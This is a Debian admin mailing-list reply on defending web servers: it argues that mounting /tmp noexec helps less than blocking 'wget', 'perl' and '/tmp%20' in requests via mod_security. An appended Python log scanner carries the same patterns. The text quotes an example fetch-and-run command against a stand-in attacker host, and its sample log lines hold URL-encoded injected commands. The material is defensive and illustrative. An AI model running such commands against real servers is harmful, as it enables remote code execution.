On Fri, Jun 23, 2006 at 10:08:25AM -0400, Michael Sprague wrote:
>
> If possible, make /tmp its own file system and mount it with 'noexec'.
> This really helps stop these types of attacks. In fact I would
> recommend 'rw,noexec,nosuid,nodev' as the mount options. Of course if
> you need to have executables in /tmp then this won't work. :)

  I used to suggest this too, but to be honest it doesn't work as well
  as you'd expect.

  Too many exploit attempts run the equivalent of:

    cd /tmp && wget http://evil.example.com/foo.pl
    perl /tmp/foo.pl &

  I found blocking "wget", "perl", and "/tmp%20", in requests more
  productive - using mod_security.

Steve
--
Debian GNU/Linux System Administration
http://www.debian-administration.org/
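
An added example, not part of the original message: a Python scan of Apache combined-format access logs for the three strings named above ("wget", "perl", "/tmp%20"), checked against both the raw and the URL-decoded request line. The log lines, addresses and paths are constructed for illustration, and the function names are hypothetical.

```python
import re
from urllib.parse import unquote

# The three strings named in the message. "/tmp%20" is matched raw, and as
# "/tmp " or "/tmp+" so the decoded and form-encoded spellings are caught too.
PATTERNS = {
    "wget": re.compile(r"\bwget\b", re.I),
    "perl": re.compile(r"\bperl\b", re.I),
    "/tmp%20": re.compile(r"/tmp(?:%20|\+| )", re.I),
}

# Apache combined log format: host ident user [time] "request" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) ')

def match_request(request):
    """Return the sorted names of the patterns found in one request line."""
    decoded = unquote(request)  # one round of URL-decoding
    return sorted(name for name, rx in PATTERNS.items()
                  if rx.search(request) or rx.search(decoded))

def scan(lines):
    """Yield (client, status, hits, request) for each matching log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, request, status = m.group(1), m.group(2), int(m.group(3))
        hits = match_request(request)
        if hits:
            yield client, status, hits, request

# Constructed sample lines (documentation address ranges, made-up paths).
SAMPLE = [
    '192.0.2.10 - - [23/Jun/2006:10:01:02 -0400] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [23/Jun/2006:10:02:11 -0400] "GET /app.php?q=cd%20/tmp%20%26%26%20wget%20http://evil.example.com/foo.pl HTTP/1.0" 200 312 "-" "-"',
    '198.51.100.7 - - [23/Jun/2006:10:02:12 -0400] "GET /app.php?q=perl%20/tmp/foo.pl HTTP/1.0" 200 312 "-" "-"',
    # Benign request that still matches: plain string rules need review.
    '203.0.113.5 - - [23/Jun/2006:10:05:40 -0400] "GET /docs/perl-tutorial.html HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, status, hits, request in scan(SAMPLE):
        print(f"{client} {status} {','.join(hits)} {request}")
```

The last sample line shows the cost of matching on bare strings: a legitimate URL containing "perl" is flagged alongside the injected commands, so hits from rules like these need triage or narrower scoping.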